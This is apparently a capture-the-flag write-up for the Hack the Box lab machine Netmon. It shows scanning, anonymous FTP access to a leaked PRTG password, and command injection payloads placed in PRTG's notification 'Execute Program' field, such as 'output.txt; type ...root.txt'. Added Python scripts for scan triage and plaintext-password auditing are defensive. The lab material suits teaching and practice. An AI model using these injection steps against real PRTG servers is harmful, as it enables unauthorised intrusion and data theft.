
Hack the Box - Netmon

Hi guys,

Today Netmon retired, and this is how I got into the machine. It was rated as the easiest machine on Hack the Box, so let's start.

Information

  • OS: Windows
  • IP: 10.10.10.152
  • Difficulty: Easy

Enumeration

First I ran an nmap scan to get some information about the machine. The result showed that it was a Windows machine with several ports open.

# nmap -sV -sC -A -Pn 10.10.10.152
Starting Nmap 7.30 ( https://nmap.org ) at 2019-05-20 13:56 KST
Nmap scan report for 10.10.10.152
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT    STATE   SERVICE     VERSION
21/tcp  open    ftp         Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM                  2024 .rnd
| 02-05-19 10:15PM      <DIR>            inetpub
| 07-16-16 09:18AM      <DIR>            PerfLogs
| 02-25-19 10:56PM      <DIR>            Program Files
| 02-03-19 12:28AM      <DIR>            Program Files (x86)
| 02-03-19 08:08AM      <DIR>            Users
| 02-25-19 11:49PM      <DIR>            Windows
80/tcp  open    http        Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open    msrpc       Microsoft Windows RPC
139/tcp open    netbios-ssn Microsoft Windows netbios-ssn
445/tcp open    microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script result:
| clock-skew:
|_  -1s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 64.75 seconds
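The scan results above can be triaged automatically. The following Python script is an added example (not from the original post or from nmap): it parses the scan output shown, trimmed to the relevant lines, groups script results under their port, and maps the risky ones to defender actions. The rules and advice strings are this example's own.

```python
"""Triage nmap -sC/-sV text output into defender findings."""
import re

# Constructed sample: the scan output from the post, trimmed to the lines
# that drive the rules below.
SAMPLE_SCAN = """\
PORT    STATE   SERVICE     VERSION
21/tcp  open    ftp         Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 08:08AM      <DIR>            Users
80/tcp  open    http        Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp open    microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\w+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")

# (pattern matched against one script line, severity, what to do about it)
RULES = [
    (r"Anonymous FTP login allowed", "high", "disable anonymous FTP or confine it to an empty share"),
    (r"message_signing: disabled", "medium", "require SMB signing via policy"),
    (r"^http-server-header: PRTG/", "info", "Server header discloses PRTG version; hide it and keep PRTG patched"),
]


def parse_scan(text):
    """Group NSE script lines under the port (or 'host') they belong to."""
    sections, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = {"service": m.group(3), "version": m.group(4), "scripts": []}
        elif line.startswith("Host script results"):
            current = "host"
            sections[current] = {"service": "", "version": "", "scripts": []}
        else:
            m = SCRIPT_RE.match(line)
            if m and current:
                sections[current]["scripts"].append(m.group(1))
    return sections


def findings(text):
    """Return (port, severity, advice) for every rule that matches a script line."""
    out = []
    for port, sec in parse_scan(text).items():
        for line in sec["scripts"]:
            out.extend((port, sev, advice) for pat, sev, advice in RULES if re.search(pat, line))
    return out
```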

Get User flag

The first thing I looked at was port 21, which was open with anonymous login allowed. So I tried opening it in a web browser at ftp://10.10.10.152/.

And this is what was inside it.

[Screenshot: Netmon FTP]

I opened ftp://10.10.10.152/Users/Public/ and there was the user.txt flag. So just download it and view the user hash.

Get Root flag

After getting the user hash via FTP, I started checking port 80 and I got this.

[Screenshot: Netmon PRTG]

It was some kind of network monitor, so I searched Google for the PRTG default login information. The default username and password are prtgadmin/prtgadmin, but I could not log in with them.

I then searched Google for a PRTG exploit and found this link, which describes a command injection vulnerability. However, I needed to be logged in to the dashboard to use it.

Getting login credentials

I went back to the FTP service, but this time I logged in from the terminal with the user Anonymous and a blank password (we can do more from the terminal than from a browser xD).

# ftp Anonymous@10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||49870|)
125 Data connection already open; Transfer starting.
11-20-16  10:46PM       <DIR>          $RECYCLE.BIN
02-03-19  12:18AM                 1024 .rnd
11-20-16  09:59PM               389408 bootmgr
07-16-16  09:10AM                    1 BOOTNXT
02-03-19  08:05AM       <DIR>          Documents and Settings
02-25-19  10:15PM       <DIR>          inetpub
06-04-19  08:37AM            738197504 pagefile.sys
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-25-19  10:56PM       <DIR>          ProgramData
02-03-19  08:05AM       <DIR>          Recovery
02-03-19  08:04AM       <DIR>          System Volume Information
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.
ftp> 

After running ls -a I could see more hidden directories, and it looked interesting.

I checked every directory and found the PRTG directory, which was /ProgramData/Paessler/PRTG\ Network\ Monitor/.

ftp> ls
229 Entering Extended Passive Mode (|||49937|)
125 Data connection already open; Transfer starting.
02-03-19  12:40AM       <DIR>          Configuration Auto-Backups
06-04-19  08:38AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-04-19  08:38AM       <DIR>          Logs (Web Server)
02-25-19  08:01PM       <DIR>          Monitoring Database
06-04-19  08:46AM              1198183 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-04-19  08:39AM              1647616 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get PRTG\ Configuration.old.bak

I downloaded PRTG Configuration.old.bak and checked what was inside the file. Yeah, I found this.

...
<dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
</dbpassword>
...
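As an added defensive check (not from the original post or from Paessler), the following Python script audits a PRTG configuration backup for `<dbpassword>` elements that still hold a readable value, which is exactly the exposure that let an anonymous FTP user recover the admin password here. The sample document is constructed from the snippet above and wrapped in a made-up `<data>` root; it needs Python 3.8+ for comment-preserving parsing.

```python
"""Audit a PRTG configuration backup for plaintext credentials."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: the <dbpassword> block from the post, wrapped in a
# made-up <data> root so it parses as a document. Real backups are larger.
SAMPLE_BACKUP = """<data>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
</data>"""

USER_RE = re.compile(r"User:\s*(\S+)")


def find_plaintext_passwords(xml_text):
    """Return (user, password) for every <dbpassword> with a readable value.

    Comments are kept (Python 3.8+) because the account name is recorded
    as an XML comment inside the element rather than as an attribute.
    """
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    findings = []
    for elem in root.iter("dbpassword"):
        user = None
        # The value is split between the element's own text and the tail
        # text that follows each comment child, so both are gathered.
        parts = [elem.text or ""]
        for child in elem:
            if child.tag is ET.Comment:
                m = USER_RE.search(child.text or "")
                if m:
                    user = m.group(1)
            parts.append(child.tail or "")
        value = "".join(parts).strip()
        if value:
            findings.append((user or "<unknown>", value))
    return findings


def redact(password):
    """Mask a secret for a report: keep the first character, hide the rest."""
    return password[0] + "*" * (len(password) - 1) if password else ""


def report(xml_text):
    """Lines suitable for a ticket; the raw secret never appears in them."""
    return ["plaintext dbpassword for %s: %s (len %d)" % (u, redact(p), len(p))
            for u, p in find_plaintext_passwords(xml_text)]
```

Run it over every `PRTG Configuration*.old*` and `Configuration Auto-Backups` file and on the share listing that exposes them; a non-empty report means a credential is recoverable by anyone who can read the file.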

Test command injection

This must be the password for the PRTG web page. But the password was incorrect, so I tried changing it to PrTg@dmin2019 and it worked xD.

Following this link, I tried executing a command to test whether it works.

  1. Click on Setup menu.

  2. In Account Settings section, click on Notifications.

  3. Click on any Notification to edit or add new.

  4. Find Execute Program option and turn it on.

  5. Put some command to execute.

    First I used

    output.txt; tree /f C:\Users\Administrator > C:\output.txt

    to check the location of root.txt.

    [Screenshot: PRTG Command Injection]

  6. Go back to the Notification object page, and click Send test notification.

  7. Select user PRTG System Administrator.

[Screenshot: PRTG Command Injection]

After that, open ftp://10.10.10.152/. The output.txt file should be there.

Download and view that file.

Folder PATH listing
Volume serial number is 00000200 684B:9CE8
C:\USERS\ADMINISTRATOR
├───Contacts
├───Desktop
|   └───root.txt
├───Documents
├───Downloads
├───Favorites
├───Links
├───Music
├───Pictures
├───Saved Games
├───Searches
└───Videos

So, the root.txt file was located at C:\Users\Administrator\Desktop\root.txt.

Getting root flag

I went back to the PRTG dashboard and edited the command in the notification to

output.txt; type C:\Users\Administrator\Desktop\root.txt > C:\output.txt

After sending a test notification, I got the root flag in the output file.

Edited: I just found this way and it is much easier lolz => Link
